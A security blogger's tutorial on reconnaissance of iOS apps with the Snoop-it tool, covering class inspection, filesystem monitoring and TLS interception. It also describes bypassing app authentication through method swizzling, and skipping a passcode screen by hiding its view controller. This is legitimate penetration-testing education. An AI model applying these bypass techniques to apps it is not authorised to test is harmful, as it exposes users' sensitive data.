iOS Application Security Part Two – Gathering Information Of an iOS App- aka. Recon

Welcome to my second article on “iOS Application Security Testing Series”. You can find Part 1 here.

Imagine a scenario where you, as an iOS Application Security Tester, are tasked with auditing an application to identify vulnerabilities. By itself, the task may not seem too daunting until you learn of a couple of conditions and constraints: you have very little information to work off on how the application operates, what protocols it uses, and you have a limited amount of time to conduct your evaluation. What do you do? In these scenarios, searching for and identifying vulnerabilities in the application can be an epic task.

In this article, I’d like to walk you through how we can analyse any preinstalled application on your device and determine things from the Source Code of the application like the Classes, the names of the View Controllers it uses, the Internal Libraries, and even details like the variables and methods names used in any class or view controller.

I generally start with Snoop-it by NESO Security Labs . Basically, I try to automate the effort of decrypting the application as much as possible.

A quick list of all the features provided by Snoop-it could be seen in the screenshot below.

Installation

To install Snoop-it on your device, Go to Cydia, tap on the Sources tab on the bottom, and tap Edit and click Add tap and add repo http://repo.nesolabs.de – tap install. Once this is done, you will see the Snoop-it app icon on your device. Open it up and you will see this user interface.

Before the first run, Snoop-it should be configured properly. For this, you need to select the App you want to analyze using the “Snoop-it Configuration App”. Within the ‘Applications’ tab, you can choose between available System/Cydia Apps or Apps installed from the official Apple App Store. For this blog, my DEMO will be Wikipedia app so I select it.

Next thing is to configure Snoop-it’s setting. In this case, I have left the port number to be 12345 and the authentication preselected default.

Now, just open the Snoop-it in any Browser web interface the address provided on the Snoop-it application. In my case, the address is http://10.80.56.187:12345  make sure that the app is opened on your device and in the foreground and now refresh the Snoop-it web interface. As you can see, you have a beautiful interface that you can use to perform a full-fledged security assessment of the application.

 

Class Information

Now we are at a stage that we can analyze the App for class information. So, let’s look at the class information for the Wikipedia app. On the left-hand side, under Analysis, go to Objective-C classes. On the right-hand side, you will see all the classes and info like properties and method names. No method selected print screen below.

The ones in orange represent the classes that have instances. if you hover your mouse over the class View Controller, you will see that it has an instance which is presently live.

Similarly, you can see the methods and properties for Wikipedia app.

Technique to bypass authentication

A well-known technique to bypass authentication called “Method Swizzling in Objective-C” is possible with Snoop-it. Just check any relevant method, and click on Setup and Invoke on the top right. Here is Old school Video Method Swizzling in Objective-C  🙂

In addition, you can trace methods and system call on the flow if desired.

View Controllers (X)

TOPasscodeViewController is an open-source UIViewController subclass that will overlay a full-screen passcode UI over an app’s content. The user must enter the correct password into it in order to proceed, or hit ‘Cancel’ to exit the private part of the app. GitHub here.

This sort of UI is useful for certain apps that contain highly sensitive information (such as banking or health) where users may indeed want an extra level of security beyond the standard iOS passcode.

Basic Implementation

- (void)showButtonTapped:(id)sender
{
    TOPasscodeViewController *passcodeViewController = [[TOPasscodeViewController alloc] initWithStyle:TOPasscodeViewStyleTranslucentDark passcodeType:TOPasscodeTypeFourDigits];
    passcodeViewController.delegate = self;
    [self presentViewController:passcodeViewController animated:YES completion:nil];
}

- (void)didTapCancelInPasscodeViewController:(TOPasscodeViewController *)passcodeViewController
{
    [self dismissViewControllerAnimated:YES completion:nil];
}

- (BOOL)passcodeViewController:(TOPasscodeViewController *)passcodeViewController isCorrectCode:(NSString *)code
{
    return [code isEqualToString:@"1234"];
}

To hack the method passcodeViewController BOOL value we can use Cycript, we can change the implementation for any given message to always return TRUE- but why all the hassle when you can just hide the View Controller.

There is a feature in Snoop-it – the extreme left-hand side, under Analysis, View Controller, the View Controller class on the right-hand side and click on Display Controller. Click on Close/Hide View Controller depending on whether the view controller is over another view controller or not.

Internal Libraries and the File System Monitoring

To monitor the numerous files and directories that are being accessed by the application.To do that, on the navigation menu on the left side, click on Filesystem under Monitoring. This feature can be useful when an application is writing to a database file and this interface helps you in figuring out that filename. You can also download these files just by double clicking on them and then analyze it on your machine.

Double Proxy Network, Web, and API Monitoring

Burp Suite and OWASP ZAP Proxy are the tools I always run in the background to intercept SSL/TLS connections seamlessly 100%.

Conclusion

In this article, we looked at how we can use Snoop-it to perform black box Recon of an App and how easy it makes it. It’s an awesome tool but there are many methods one may employ in achieving one’s ends. We could have used Introspy which is undoubtedly one of the most powerful tools for analyzing the security of IOS applications or Clutch, Class-dump-z, LLDB, Hopper, idb , Cycript. and Frida which is a Dynamic instrumentation toolkit for developers, and reverse-engineers.,

About Liban Mohamud

My name is Liban Mohamud, I hold M S.c in Digital Investigations, Forensics and Computer Security from University College Dublin (UCD). I’m an Information Security Specialist and researcher with a passion for Mobile Security and Mobile Forensics and I have over 15 years experience in the industry. @coolx28

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.